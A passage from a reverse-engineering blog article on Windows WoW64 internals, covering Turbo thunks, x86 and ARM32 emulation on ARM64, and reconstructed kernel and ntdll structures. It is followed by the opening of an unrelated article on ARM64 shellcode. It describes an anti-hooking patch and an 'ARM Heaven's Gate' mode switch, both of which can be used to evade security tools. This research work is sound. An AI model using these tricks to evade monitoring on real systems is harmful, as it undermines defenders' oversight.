The sign-extension of HANDLE makes sense, because if we pass there an INVALID_HANDLE_VALUE, which happens to be 0xFFFFFFFF (-1) on 32-bits, we don’t want to convert this value to 0x00000000FFFFFFFF, but 0xFFFFFFFFFFFFFFFF.

On the other hand, if the TurboThunkNumber is 0, the call will end up in theTurboDispatchJumpAddressEnd which in turn calls wow64!Wow64SystemServiceEx. You can consider this case as the “slow path”.

Disabling Turbo thunks

On Windows x64, the Turbo thunk optimization can be actually disabled!

In one of the previous sections I’ve been talking about ntdll32!NtWow64CallFunction64 andwow64!Wow64CallFunctionTurboThunkControl functions. As with any other NtWow64* function, NtWow64CallFunction64 is only available in the WoW64 ntdll.dll. This function can be called with an index to WoW64 function in the Wow64FunctionDispatch64 table (you could see earlier).

The function prototype might look like this:

typedef enum _WOW64_FUNCTION {
Wow64Function64Nop,
Wow64FunctionQueryProcessDebugInfo,
Wow64FunctionTurboThunkControl,
Wow64FunctionCfgDispatchControl,
Wow64FunctionOptimizeChpeImportThunks,
} WOW64_FUNCTION;
NTSYSCALLAPI
NTSTATUS
NTAPI
NtWow64CallFunction64(
_In_ WOW64_FUNCTION Wow64Function,
_In_ ULONG Flags,
_In_ ULONG InputBufferLength,
_In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,
_In_ ULONG OutputBufferLength,
_Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,
_Out_opt_ PULONG ReturnLength
);

NOTE: This function prototype has been reconstructed with the help of thewow64!Wow64CallFunction64Nop function code, which just logs the parameters.

We can see that wow64!Wow64CallFunctionTurboThunkControl can be called with an index of 2. This function performs some sanity checks and then passes callswow64cpu!BTCpuTurboThunkControl(*(ULONG*)InputBuffer).

wow64cpu!BTCpuTurboThunkControl then checks the input parameter.

  • If it’s 0, it patches every target of the jump table to point to TurboDispatchJumpAddressEnd(remember, this is the target that is called when WOW64_SYSTEM_SERVICE.TurboThunkNumber is 0).
  • If it’s non-0, it returns STATUS_NOT_SUPPORTED.

This means 2 things:

  • Calling wow64cpu!BTCpuTurboThunkControl(0) disables the Turbo thunks, and every system call ends up taking the “slow path”.
  • It is not possible to enable them back.

With all this in mind, we can achieve disabling Turbo thunks by this call:

#define WOW64_TURBO_THUNK_DISABLE 0
#define WOW64_TURBO_THUNK_ENABLE 1 // STATUS_NOT_SUPPORTED 🙁
ThunkInput = WOW64_TURBO_THUNK_DISABLE;
Status = NtWow64CallFunction64(Wow64FunctionTurboThunkControl,
0,
sizeof(ThunkInput),
&ThunkInput,
0,
NULL,
NULL);

What it might be good for? I can think of 3 possible use-cases:

  • If we deploy custom wow64log.dll (explained earlier), disabling Turbo thunks guarantees that we will see every WoW64 system call in our wow64log!Wow64LogSystemService callback. We wouldn’t see such calls if the Turbo thunks were enabled, because they would take the “fast path” inside of the wow64cpu.dll where the syscall would be executed.
  • If we decide to hook Nt* functions in the native ntdll.dll, disabling Turbo thunks guarantees that for each Nt* function called in the ntdll32.dll, the correspondint Nt* function will be called in the native ntdll.dll. (This is basically the same point as the previous one.)

    NOTE: Keep in mind that this only applies on system calls, i.e. on Nt* or Zw* functions. Other functions are not called from the 32-bit ntdll.dll to the 64-bit ntdll.dll. For example, if we hooked RtlDecompressBuffer in the native ntdll.dll of the WoW64 process, it wouldn’t be called on ntdll32!RtlDecompressBuffer call. This is because the full implementaion of the Rtl*functions is already in the ntdll32.dll.

  • We can “harmlessly” patch high-word moved to the eax in every WoW64 system call stub to 0. For example we could see in NtWaitForSingleObject there is mov eax, 0D0004h. If we patched appropriate 2 bytes in that instruction so that the instruction would become mov eax, 4h, the system call would still work.This approach can be used as an anti-hooking technique — if there’s a jump at the start of the function, the patch will break it. If there’s not a jump, we just disable the Turbo thunk for this function.

x86 on ARM64

Emulation of x86 applications on ARM64 is handled by an actual binary translation. Instead of wow64cpu.dll, the xtajit.dll (probably shortcut for “x86 to ARM64 JIT”) is used for its emulation. As with other emulation DLLs, this DLL is native (ARM64).

The x86 emulation on Windows ARM64 consists also of other “XTA” components:

  • xtac.exe — XTA Compiler
  • XtaCache.exe — XTA Cache Service

Execution of x86 programs on ARM64 appears to go way behind just emulation. It is also capable of caching already binary-translated code, so that next execution of the same application should be faster. This cache is located in the Windows\XtaCache directory which contains files in format FILENAME.EXT.HASH1.HASH2.mp.N.jc. These files are then mapped to the user-mode address space of the application. If you’re asking whether you can find an actual ARM64 code in these files — indeed, you can.

The whole “XTA” and its internals are not in the focus of this article, but they would definitely deserve a separate article.

Unfortunatelly, Microsoft doesn’t provide symbols to any of these xta* DLLs or executables. But if you’re feeling adventurous, you can find some interesting artifacts, like this array of structures inside of the xtajit.dll, which contains name of the function and its pointer. There are thousands of items in this array:

BT functions (before) (ARM64)
BT functions (before) (ARM64)

With a simple Python script, we can mass-rename all functions referenced in this array:

begin = 0x01800A8C20
end = 0x01800B7B4F
struct_size = 24
ea = begin
while ea < end:
ea += struct_size
name = idc.GetString(idc.Qword(ea))
idc.MakeName(idc.Qword(ea+8), name)
view raw2_IDA_BT_rename.py hosted with ❤ by GitHub

I’d like to thank Milan Boháček for providing me this script.

BT functions (after) (ARM64)
BT functions (after) (ARM64)
BT translated function list (ARM64)
BT translated function list (ARM64)

Windows\SyCHPE32 & Windows\SysWOW64

One thing you can observe on ARM64 is that it contains two folders used for x86 emulation. The difference between them is that SyCHPE32 contains small subset of DLLs that are frequently used by applications, while contents of the SysWOW64 folder is quite identical with the content of this folder on Windows x64.

The CHPE DLLs are not pure-x86 DLLs and not even pure-ARM64 DLLs. They are “compiled-hybrid-PE”s. What does it mean? Let’s see:

NtMapViewOfSection (CHPE) (ARM64)
NtMapViewOfSection (CHPE) (ARM64)

After opening SyCHPE32\ntdll.dll, IDA will first tell us — unsurprisingly — that it cannot download PDB for this DLL. After looking at randomly chosen Nt* function, we can see that it doesn’t differ from what we would see in the SysWOW64\ntdll.dll. Let’s look at some non-Nt* function:

RtlDecompressBuffer (CHPE) (ARM64)
RtlDecompressBuffer (CHPE) (ARM64)

We can see it contains regular x86 function prologue, immediately followed by x86 function epilogue and then jump somewhere, where it looks like that there’s just garbage.

My guess is that the reason for this prologue is probably compatibility with applications that check whether some particular functions are hooked or not — by checking if the first bytes of the function contain real prologue.

NOTE: Again, if you’re feeling adventurous, you can patch FileHeader.Machine field in the PE header to IMAGE_FILE_MACHINE_ARM64 (0xAA64) and open this file in IDA. You will see a whole lot of correctly resolved ARM64 functions. Again, I’d like to thank to Milan Boháček for this tip.

If your question is “how are these images generated?”, I would answer that I don’t know, but my bet would be on some internal version of Microsoft’s C++ compiler toolchain. This idea appears to be supported by various occurences of the CHPE keyword in the ChakraCore codebase.

ARM32 on ARM64

The loop inside of the wowarmhw!BTCpuSimulate is fairly simple compared to wow64cpu.dll loop:

DECLSPEC_NORETURN
VOID
BTCpuSimulate(
VOID
)
{
NTSTATUS Status;
PCONTEXT Context;
//
// Gets WoW64 CONTEXT structure (ARM32) using
// the RtlWow64GetCurrentCpuArea() function.
//
Status = CpupGetArmContext(&Context, NULL);
if (!NT_SUCCESS(Status))
{
RtlRaiseStatus(Status);
//
// UNREACHABLE
//
return;
}
for (;;)
{
//
// Switch to ARM32 mode and run the emulation.
//
NtCurrentTeb()->TlsSlots[/* 2 */ WOW64_TLS_INCPUSIMULATION] = TRUE;
CpupSwitchTo32Bit(Context);
NtCurrentTeb()->TlsSlots[/* 2 */ WOW64_TLS_INCPUSIMULATION] = FALSE;
//
// When we get here, it means ARM32 code performed a system call.
// Advance instruction pointer to skip the «UND 0F8h» instruction.
//
Context->Pc += 2;
//
// Set LSB (least significat bit) if ARM32 is executing in
// Thumb mode.
//
if (Context->Cpsr & 0x20) {
Context->Pc |= 1;
}
//
// Let wow64.dll emulate the system call. R12 has the system call
// number, Sp points to the stack which contains the system call
// arguments.
//
Context->R0 = Wow64SystemServiceEx(Context->R12, Context->Sp);
}
}

CpupSwitchTo32Bit does nothing else than saving the whole CONTEXT, performing SVC 0xFFFFinstruction and then restoring the CONTEXT.

nt!KiEnter32BitMode / SVC 0xFFFF

I won’t be explaining here how system call dispatching works in the ntoskrnl.exe — Bruce Dang already did an excellent job doing it. This section is a follow up on his article, though.

SVC instruction is sort-of equivalent of SYSCALL instruction on ARM64 — it basically enters the kernel mode. But there is a small difference between SYSCALL and SVC: while on Windows x64 the system call number is moved into the eax register, on ARM64 the system call number can be encoded directly into the SVC instruction.

SVC 0xFFFF (ARM64)
SVC 0xFFFF (ARM64)

Let’s peek for a moment into the kernel to see how is this SVC instruction handled:

  • nt!KiUserExceptionHandler
    • nt!KiEnter32BitMode
KiUserExceptionHandler (ARM64)
KiUserExceptionHandler (ARM64)
KiEnter32BitMode (ARM64)
KiEnter32BitMode (ARM64)

We can see that:

  • MRS X30, ELR_EL1 — current interrupt-return address (stored in ELR_EL1 system register) will be moved to the register X30 (link register — LR).
  • MSR ELR_EL1, X15 — the interrupt-return address will be replaced by value in the register X15(which is aliased to the instruction pointer register — PC — in the 32-bit mode).
  • ORR X16, X16, #0b10000 — bit [4] is being set in X16 which is later moved to the SPSR_EL1register. Setting this bit switches the execution mode to 32-bits.

Simply said, in the X15 register, there is an address that will be executed once we leave the kernel-mode and enter the user-mode — which happens with the ERET instruction at the end.

nt!KiExit32BitMode / UND #0xF8

Alright, we’re in the 32-bit ARM mode now, how exactly do we leave? Windows solves this transition via UND instruction — which is similar to the UD2 instruction on the Intel CPUs. If you’re not familiar with it, you just need to know that it is instruction that basically guarantees that it’ll throw “invalid instruction” exception which can OS kernel handle. It is defined-“undefined instruction”. Again there is the same difference between the UND and UD2 instruction in that the ARM can have any 1-byte immediate value encoded directly in the instruction.

Let’s look at the NtMapViewOfSection system call in the SysArm32\ntdll.dll:

NtMapViewOfSection (ARM64)
NtMapViewOfSection (ARM64)

Let’s peek into the kernel again:

  • nt!KiUser32ExceptionHandler
    • nt!KiFetchOpcodeAndEmulate
      • nt!KiExit32BitMode
KiEnter32BitMode (ARM64)
KiEnter32BitMode (ARM64)
KiEnter32BitMode (ARM64)
KiEnter32BitMode (ARM64)

Keep in mind that meanwhile the 32-bit code is running, it cannot modify the value of the previously stored X30 register — it is not visible in 32-bit mode. It stays there the whole time. Upon UND #0xF8 execution, following happens:

  • the KiFetchOpcodeAndEmulate function moves value of X30 into X24 register (not shown on the screenshot).
  • AND X19, X16, #0xFFFFFFFFFFFFFFC0 — bit [4] (among others) is being cleared in the X19register, which is later moved to the SPSR_EL1 register. Clearing this bit switches the execution mode back to 64-bits.
  • KiExit32BitMode then moves the value of X24 register into the ELR_EL1 register. That means when this function finishes its execution, the ERET brings us back to the 64bit code, right after the SVC 0xFFFF instruction.

NOTE: It can be noticed that Windows uses UND instruction for several purposes. Common example might also be UND #0xFE which is used as a breakpoint instruction (equivalent of __debugbreak() / int3)

As you could spot, 3 kernel transitions are required for emulation of the system call (SVC 0xFFFF, system call itself, UND 0xF8). This is because on ARM there doesn’t exist a way how to switch between 32-bit and 64-bit mode only in user-mode.

If you’re looking for “ARM Heaven’s Gate” — this is it. Put whatever function address you like into the X15 register and execute SVC 0xFFFF. Next instruction will be executed in the 32-bit ARM mode, starting with that address. When you feel you’d like to come back into 64-bit mode, simply execute UND #0xF8 and your execution will continue with the next instruction after the SVC 0xFFFF.

Appendix

////////////////////////////////////////////////////////////////////////////////
// General definitions.
////////////////////////////////////////////////////////////////////////////////
//
// Context flags.
// winnt.h (Windows SDK)
//
#define CONTEXT_i386 0x00010000L
#define CONTEXT_AMD64 0x00100000L
#define CONTEXT_ARM 0x00200000L
#define CONTEXT_ARM64 0x00400000L
//
// Machine type.
// winnt.h (Windows SDK)
//
#define IMAGE_FILE_MACHINE_TARGET_HOST 0x0001 // Useful for indicating we want to interact with the host and not a WoW guest.
#define IMAGE_FILE_MACHINE_I386 0x014c // Intel 386.
#define IMAGE_FILE_MACHINE_ARMNT 0x01c4 // ARM Thumb-2 Little-Endian
#define IMAGE_FILE_MACHINE_ARM64 0xAA64 // ARM64 Little-Endian
#define IMAGE_FILE_MACHINE_CHPE_X86 0x3A64 // Hybrid PE (defined in ntimage.h (WDK))
////////////////////////////////////////////////////////////////////////////////
// ntoskrnl.exe
////////////////////////////////////////////////////////////////////////////////
typedef struct _PS_NTDLL_EXPORT_ITEM {
PCSTR RoutineName;
PVOID RoutineAddress;
} PS_NTDLL_EXPORT_ITEM, *PPS_NTDLL_EXPORT_ITEM;
PS_NTDLL_EXPORT_ITEM NtdllExports[] = {
//
// 19 exports on x64
// 14 exports on ARM64
//
};
PVOID PsWowX86SharedInformation[Wow64SharedPageEntriesCount];
PS_NTDLL_EXPORT_ITEM NtdllWowX86Exports[] = {
{ «LdrInitializeThunk«,
&PsWowX86SharedInformation[SharedNtdll32LdrInitializeThunk] },
{ «KiUserExceptionDispatcher«,
&PsWowX86SharedInformation[SharedNtdll32KiUserExceptionDispatcher] },
{ «KiUserApcDispatcher«,
&PsWowX86SharedInformation[SharedNtdll32KiUserApcDispatcher] },
{ «KiUserCallbackDispatcher«,
&PsWowX86SharedInformation[SharedNtdll32KiUserCallbackDispatcher] },
{ «RtlUserThreadStart«,
&PsWowX86SharedInformation[SharedNtdll32RtlUserThreadStart] },
{ «RtlpQueryProcessDebugInformationRemote«,
&PsWowX86SharedInformation[SharedNtdll32pQueryProcessDebugInformationRemote] },
{ «LdrSystemDllInitBlock«,
&PsWowX86SharedInformation[SharedNtdll32LdrSystemDllInitBlock] },
{ «RtlpFreezeTimeBias«,
&PsWowX86SharedInformation[SharedNtdll32RtlpFreezeTimeBias] },
};
#ifdef _M_ARM64
PVOID PsWowArm32SharedInformation[Wow64SharedPageEntriesCount];
PS_NTDLL_EXPORT_ITEM NtdllWowArm32Exports[] = {
//
// …
//
};
PVOID PsWowAmd64SharedInformation[Wow64SharedPageEntriesCount];
PS_NTDLL_EXPORT_ITEM NtdllWowAmd64Exports[] = {
//
// …
//
};
PVOID PsWowChpeX86SharedInformation[Wow64SharedPageEntriesCount];
PS_NTDLL_EXPORT_ITEM NtdllWowChpeX86Exports[] = {
//
// …
//
};
#endif // _M_ARM64
//
// …
//
typedef struct _PS_NTDLL_EXPORT_INFORMATION {
PPS_NTDLL_EXPORT_ITEM NtdllExports;
SIZE_T Count;
} PS_NTDLL_EXPORT_INFORMATION, *PPS_NTDLL_EXPORT_INFORMATION;
//
// RTL_NUMBER_OF(NtdllExportInformation)
// == 6
// == (SYSTEM_DLL_TYPE)PsSystemDllTotalTypes
//
PS_NTDLL_EXPORT_INFORMATION NtdllExportInformation[PsSystemDllTotalTypes] = {
{ NtdllExports, RTL_NUMBER_OF(NtdllExports) },
{ NtdllWowX86Exports, RTL_NUMBER_OF(NtdllWowX86Exports) },
#ifdef _M_ARM64
{ NtdllWowArm32Exports, RTL_NUMBER_OF(NtdllWowArm32Exports) },
{ NtdllWowAmd64Exports, RTL_NUMBER_OF(NtdllWowAmd64Exports) },
{ NtdllWowChpeX86Exports, RTL_NUMBER_OF(NtdllWowChpeX86Exports) },
#endif // _M_ARM64
//
// { NULL, 0 } for the rest…
//
};
typedef struct _PS_SYSTEM_DLL_INFO {
//
// Flags.
// Initialized statically.
//
USHORT Flags;
//
// Machine type of this WoW64 NTDLL.
// Initialized statically.
// Examples:
// — IMAGE_FILE_MACHINE_I386
// — IMAGE_FILE_MACHINE_ARMNT
//
USHORT MachineType;
//
// Unused, always 0.
//
ULONG Reserved1;
//
// Path to the WoW64 NTDLL.
// Initialized statically.
// Examples:
// — «\\SystemRoot\\SysWOW64\\ntdll.dll»
// — «\\SystemRoot\\SysArm32\\ntdll.dll»
//
UNICODE_STRING Ntdll32Path;
//
// Image base of the DLL.
// Initialized at runtime by PspMapSystemDll.
// Equivalent of:
// RtlImageNtHeader(BaseAddress)->
// OptionalHeader.ImageBase;
//
PVOID ImageBase;
//
// Contains DLL name (such as «ntdll.dll» or
// «ntdll32.dll») before runtime initialization.
// Initialized at runtime by MmMapViewOfSectionEx,
// called from PspMapSystemDll.
//
union {
PVOID BaseAddress;
PWCHAR DllName;
};
//
// Unused, always 0.
//
PVOID Reserved2;
//
// Section relocation information.
//
PVOID SectionRelocationInformation;
//
// Unused, always 0.
//
PVOID Reserved3;
} PS_SYSTEM_DLL_INFO, *PPS_SYSTEM_DLL_INFO;
typedef struct _PS_SYSTEM_DLL {
//
// _SECTION* object of the DLL.
// Initialized at runtime by PspLocateSystemDll.
//
union {
EX_FAST_REF SectionObjectFastRef;
PVOID SectionObject;
};
//
// Push lock.
//
EX_PUSH_LOCK PushLock;
//
// System DLL information.
// This part is returned by PsQuerySystemDllInfo.
//
PS_SYSTEM_DLL_INFO SystemDllInfo;
} PS_SYSTEM_DLL, *PPS_SYSTEM_DLL;
////////////////////////////////////////////////////////////////////////////////
// ntdll.dll
////////////////////////////////////////////////////////////////////////////////
ULONG
RtlpArchContextFlagFromMachine(
_In_ USHORT MachineType
)
/*++
Routine description:
This routine translates architecture-specific CONTEXT
flag to the machine type.
Arguments:
MachineType — One of IMAGE_FILE_MACHINE_* values.
Return Value:
Context flag.
Note:
RtlpArchContextFlagFromMachine can be found only in
ntoskrnl.exe symbols, but from ntdll.dll disassembly
it is obvious that this function is present there
as well (probably __forceinline’d, or used as a macro).
—*/
{
switch (MachineType)
{
case IMAGE_FILE_MACHINE_I386:
return CONTEXT_i386;
case IMAGE_FILE_MACHINE_AMD64:
return CONTEXT_AMD64;
case IMAGE_FILE_MACHINE_ARMNT:
return CONTEXT_ARM;
case IMAGE_FILE_MACHINE_ARM64:
return CONTEXT_ARM64;
default:
return 0;
}
}
ULONG
RtlpGetLegacyContextLength(
_In_ ULONG ArchContextFlag,
_Out_opt_ PULONG SizeOfContext,
_Out_opt_ PULONG AlignOfContext
)
/*++
Routine description:
This routine determines size and alignment of the architecture-
-specific CONTEXT structure.
Arguments:
ArchContextFlag — Architecture-specific CONTEXT flag.
SizeOfContext — Receives sizeof(CONTEXT).
AlignOfContext — Receives __alignof(CONTEXT).
Return Value:
Alignment of the CONTEXT structure.
Note:
You can find corresponding DECLSPEC_ALIGN specifiers
for each CONTEXT structure in the winnt.h (Windows SDK).
By WOW64_CONTEXT_* here is meant an original CONTEXT
structure for the specific architecture (as CONTEXT
structures for other architectures are not available,
because it is selected during compile-time).
—*/
{
ULONG SizeOf = 0;
ULONG AlignOf = 0;
switch (ArchContextFlag)
{
case CONTEXT_i386:
SizeOf = sizeof(WOW64_CONTEXT_i386);
AlignOf = __alignof(WOW64_CONTEXT_i386); // 4
break;
case CONTEXT_AMD64:
SizeOf = sizeof(WOW64_CONTEXT_AMD64);
AlignOf = __alignof(WOW64_CONTEXT_AMD64); // 16
break;
case CONTEXT_ARM:
SizeOf = sizeof(WOW64_CONTEXT_ARM);
AlignOf = __alignof(WOW64_CONTEXT_ARM); // 8
break;
case CONTEXT_ARM64:
SizeOf = sizeof(WOW64_CONTEXT_ARM64);
AlignOf = __alignof(WOW64_CONTEXT_ARM64); // 16
break;
}
if (SizeOfContext) {
*SizeOfContext = SizeOf;
}
if (AlignOfContext) {
*AlignOfContext = AlignOf;
}
return AlignOf;
}
PULONG
RtlpGetContextFlagsLocation(
_In_ PCONTEXT_UNION Context,
_In_ ULONG ArchContextFlag
)
/*++
Routine description:
This routine returns pointer to the the «ContextFlags»
member of the CONTEXT structure.
Arguments:
Context — Architecture-specific CONTEXT structure.
ArchContextFlag — Architecture-specific CONTEXT flag.
Return Value:
Pointer to the the «ContextFlags» member.
—*/
{
//
// ContextFlags is always the first member of the
// CONTEXT struct — except for AMD64.
//
switch (ArchContextFlag)
{
case CONTEXT_i386:
return &Context->X86.ContextFlags; // Context + 0x00
case CONTEXT_AMD64:
return &Context->X64.ContextFlags; // Context + 0x30
case CONTEXT_ARM:
return &Context->ARM.ContextFlags; // Context + 0x00
case CONTEXT_ARM64:
return &Context->ARM64.ContextFlags; // Context + 0x00
default:
//
// Assume first member (Context + 0x00).
//
return (PULONG)Context;
}
}
//
// Architecture-specific WoW64 structure,
// holding the machine type and context
// structure.
//
#define WOW64_CPURESERVED_FLAG_RESET_STATE 1
typedef struct _WOW64_CPURESERVED {
USHORT Flags;
USHORT MachineType;
//
// CONTEXT has different alignment for
// each architecture and its location
// is determined at runtime (see
// RtlWow64GetCpuAreaInfo below).
//
// CONTEXT Context;
// CONTEXT_EX ContextEx;
//
} WOW64_CPURESERVED, *PWOW64_CPURESERVED;
typedef struct _WOW64_CPU_AREA_INFO {
PCONTEXT_UNION Context;
PCONTEXT_EX ContextEx;
PVOID ContextFlagsLocation;
PWOW64_CPURESERVED CpuReserved;
ULONG ContextFlag;
USHORT MachineType;
} WOW64_CPU_AREA_INFO, *PWOW64_CPU_AREA_INFO;
NTSTATUS
RtlWow64GetCpuAreaInfo(
_In_ PWOW64_CPURESERVED CpuReserved,
_In_ ULONG Reserved,
_Out_ PWOW64_CPU_AREA_INFO CpuAreaInfo
)
/*++
Routine description:
This routine returns architecture- and WoW64-specific
information based on the CPU-reserved region. It is
used mainly for fetching MachineType and the pointer
to the architecture-specific CONTEXT structure (which
is part of the WOW64_CPURESERVED structure). Because
the CONTEXT structure has different size and alignment
for each architecture, the pointer must be obtained
dynamically.
Arguments:
CpuReserved — WoW64 CPU-reserved region, usually located
at NtCurrentTeb()->TlsSlots[/* 1 */ WOW64_TLS_CPURESERVED]
Reserved — Unused. All callers set this argument to 0.
CpuAreaInfo — Receives the CPU-area information.
Return Value:
STATUS_SUCCESS — on success
STATUS_INVALID_PARAMETER — if CpuReserved contains invalid MachineType
*/
{
ULONG ContextFlag;
ULONG SizeOfContext;
ULONG AlignOfContext;
//
// In the ntdll.dll, this call is probably inlined, because
// RtlpArchContextFlagFromMachine symbol is not present there.
//
ContextFlag = RtlpArchContextFlagFromMachine(CpuReserved->MachineType);
if (!ContextFlag) {
return STATUS_INVALID_PARAMETER;
}
RtlpGetLegacyContextLength(ContextFlag, &SizeOfContext, &AlignOfContext);
//
// CpuAreaInfo->Context = &CpuReserved->Context;
// CpuAreaInfo->ContextEx = &CpuReserved->ContextEx;
//
CpuAreaInfo->Context = ALIGN_UP_POINTER_BY(
(PUCHAR)CpuArea + sizeof(WOW64_CPU_AREA),
AlignOfContext
);
CpuAreaInfo->ContextEx = ALIGN_UP_POINTER_BY(
(PUCHAR)Context + SizeOfContext + sizeof(CONTEXT_EX),
sizeof(PVOID)
);
CpuAreaInfo->ContextFlagsLocation = ContextFlagsLocation;
CpuAreaInfo->CpuArea = CpuArea;
CpuAreaInfo->ContextFlag = ContextFlag;
CpuAreaInfo->MachineType = CpuReserved->MachineType;
return STATUS_SUCCESS;
}
////////////////////////////////////////////////////////////////////////////////
// wow64.dll
////////////////////////////////////////////////////////////////////////////////
//
// WOW64INFO, based on:
// wow64t.h (WRK: https://github.com/mic101/windows/blob/master/WRK-v1.2/public/internal/base/inc/wow64t.h#L269)
//
#define WOW64_CPUFLAGS_MSFT64 0x00000001
#define WOW64_CPUFLAGS_SOFTWARE 0x00000002
typedef struct _WOW64INFO {
ULONG NativeSystemPageSize;
ULONG CpuFlags;
ULONG Wow64ExecuteFlags;
ULONG Unknown1;
USHORT NativeMachineType;
USHORT EmulatedMachineType;
} WOW64INFO, *PWOW64INFO;
//
// Thread Local Storage (TLS) support. TLS slots are statically allocated.
// wow64tls.h (WRK: https://github.com/mic101/windows/blob/master/WRK-v1.2/public/internal/base/inc/wow64tls.h#L23)
// Note: Not all fields probably matches their names on Windows 10.
//
#define WOW64_TLS_STACKPTR64 0 // contains 64-bit stack ptr when simulating 32-bit code
#define WOW64_TLS_CPURESERVED 1 // per-thread data for the CPU simulator
#define WOW64_TLS_INCPUSIMULATION 2 // Set when inside the CPU
#define WOW64_TLS_TEMPLIST 3 // List of memory allocated in thunk call.
#define WOW64_TLS_EXCEPTIONADDR 4 // 32-bit exception address (used during exception unwinds)
#define WOW64_TLS_USERCALLBACKDATA 5 // Used by win32k callbacks
#define WOW64_TLS_EXTENDED_FLOAT 6 // Used in ia64 to pass in floating point
#define WOW64_TLS_APCLIST 7 // List of outstanding usermode APCs
#define WOW64_TLS_FILESYSREDIR 8 // Used to enable/disable the filesystem redirector
#define WOW64_TLS_LASTWOWCALL 9 // Pointer to the last wow call struct (Used when wowhistory is enabled)
#define WOW64_TLS_WOW64INFO 10 // Wow64Info address (structure shared between 32-bit and 64-bit code inside Wow64).
#define WOW64_TLS_INITIAL_TEB32 11 // A pointer to the 32-bit initial TEB
#define WOW64_TLS_PERFDATA 12 // A pointer to temporary timestamps used in perf measurement
#define WOW64_TLS_DEBUGGER_COMM 13 // Communicate with 32bit debugger for event notification
#define WOW64_TLS_INVALID_STARTUP_CONTEXT 14 // Used by IA64 to indicate an invalid startup context. After startup, it stores a pointer to the context.
#define WOW64_TLS_SLIST_FAULT 15 // Used to retry RtlpInterlockedPopEntrySList faults
#define WOW64_TLS_UNWIND_NATIVE_STACK 16 // Forces an unwind of the native 64-bit stack after an APC
#define WOW64_TLS_APC_WRAPPER 17 // Holds the Wow64 APC jacket routine
#define WOW64_TLS_IN_SUSPEND_THREAD 18 // Indicates the current thread is in the middle of NtSuspendThread. Used by software CPUs.
#define WOW64_TLS_MAX_NUMBER 19 // Maximum number of TLS slot entries to allocate
typedef struct _WOW64_ERROR_CASE {
ULONG Case;
NTSTATUS TransformedStatus;
} WOW64_ERROR_CASE, *PWOW64_ERROR_CASE;
typedef struct _WOW64_SERVICE_TABLE_DESCRIPTOR {
//
// struct _KSERVICE_TABLE_DESCRIPTOR {
//
// //
// // Pointer to a system call table (array of function pointers).
// //
//
// PULONG_PTR Base;
//
// //
// // Pointer to a system call count table.
// // This field has been set only on checked (debug) builds,
// // where the Count (with the corresponding system call index)
// // has been incremented with each system call.
// // On non-checked builds it is set to NULL.
// //
//
// PULONG Count;
//
// //
// // Maximum number of items in the system call table.
// // In ntoskrnl.exe it corresponds with the actual number
// // of system calls. In wow64.dll it is set to 4096.
// //
//
// ULONG Limit;
//
// //
// // Pointer to a system call argument table.
// // The elements in this table actually contain how many
// // bytes on the stack are assigned to the function parameters
// // for a particular system call.
// // On 32-bit systems, if you divide this number by 4, you’ll
// // get the the number of arguments that the system call expects.
// //
//
// PUCHAR Number;
// };
//
KSERVICE_TABLE_DESCRIPTOR Descriptor;
//
// Extended fields of the WoW64 servie table:
// Wow64HandleSystemServiceError
//
WOW64_ERROR_CASE ErrorCaseDefault;
PWOW64_ERROR_CASE ErrorCase;
} WOW64_SERVICE_TABLE_DESCRIPTOR, *PWOW64_SERVICE_TABLE_DESCRIPTOR;
#define WOW64_NTDLL_SERVICE_INDEX 0
#define WOW64_WIN32U_SERVICE_INDEX 1
#define WOW64_KERNEL32_SERVICE_INDEX 2
#define WOW64_USER32_SERVICE_INDEX 3
#define WOW64_SERVICE_TABLE_MAX 4
WOW64_SERVICE_TABLE_DESCRIPTOR ServiceTables[WOW64_SERVICE_TABLE_MAX];
typedef struct _WOW64_LOG_SERVICE
{
PVOID Reserved;
PULONG Arguments;
ULONG ServiceTable;
ULONG ServiceNumber;
NTSTATUS Status;
BOOLEAN PostCall;
} WOW64_LOG_SERVICE, *PWOW64_LOG_SERVICE;
NTSTATUS
Wow64HandleSystemServiceError(
_In_ NTSTATUS ExceptionStatus,
_In_ PWOW64_LOG_SERVICE LogService
)
/*++
Routine description:
This routine transforms exception from native system
call to WoW64-compatible NTSTATUS.
Arguments:
ExceptionStatus — NTSTATUS raised from executing system call.
LogService — Information about the WoW64 system call.
Return Value:
Transformed NTSTATUS.
—*/
{
PWOW64_SERVICE_TABLE_DESCRIPTOR ServiceTable;
PWOW64_ERROR_CASE ErrorCaseTable;
ULONG ErrorCase;
NTSTATUS TransformedStatus;
ErrorCaseTable = ServiceTables[LogService->ServiceTable].ErrorCase;
if (!ErrorCaseTable)
{
ErrorCaseTable = &ServiceTables[LogService->ServiceTable].ErrorCaseDefault;
}
ErrorCase = ErrorCaseTable[LogService->ServiceNumber].ErrorCase;
TransformedStatus = ErrorCaseTable[LogService->ServiceNumber].TransformedStatus;
switch (ErrorCase)
{
case 0:
return ExceptionStatus;
case 1:
NtCurrentTeb()->LastErrorValue = RtlNtStatusToDosError(ExceptionStatus);
return ExceptionStatus;
case 2:
return TransformedStatus;
case 3:
NtCurrentTeb()->LastErrorValue = RtlNtStatusToDosError(ExceptionStatus);
return TransformedStatus;
default:
return STATUS_INVALID_PARAMETER;
}
}
view raw2_appendix.h hosted with ❤ by GitHub

References

How does one retrieve the 32-bit context of a Wow64 program from a 64-bit process on Windows Server 2003 x64?
http://www.nynaeve.net/?p=191

Mixing x86 with x64 code
http://blog.rewolf.pl/blog/?p=102

Windows 10 on ARM
https://channel9.msdn.com/Events/Build/2017/P4171

Knockin’ on Heaven’s Gate – Dynamic Processor Mode Switching
http://rce.co/knockin-on-heavens-gate-dynamic-processor-mode-switching/

Closing “Heaven’s Gate”
http://www.alex-ionescu.com/?p=300

Реклама

A Guide to ARM64 / AArch64 Assembly on Linux with Shellcodes and Cryptography

( Original text by odzhan )

Introduction

The Cortex-A76 codenamed “Enyo” will be the first of three CPU cores from ARM designed to target the laptop market between 2018-2020. ARM already has a monopoly on handheld devices, and are now projected to take a share of the laptop and server market. First, Apple announced in April 2018 its intention to replace Intel with ARM for their Macbook CPU from 2020 onwards. Second, a company called Ampere started shipping a 64-bit ARM CPU for servers in September 2018 that’s intended to compete with Intel’s XEON CPU. Moreover, the Automotive Enhanced (AE) version of the A76 unveiled in the same month will target applications like self-driving cars. The A76 will continue to support A32 and T32 instruction sets, but only for unprivileged code. Privileged code (kernel, drivers, hyper-visor) will only run in 64-bit mode. It’s clear that ARM intends to phase out support for 32-bit code with its A series. Developers of Linux distros have also decided to drop support for all 32-bit architectures, including ARM.

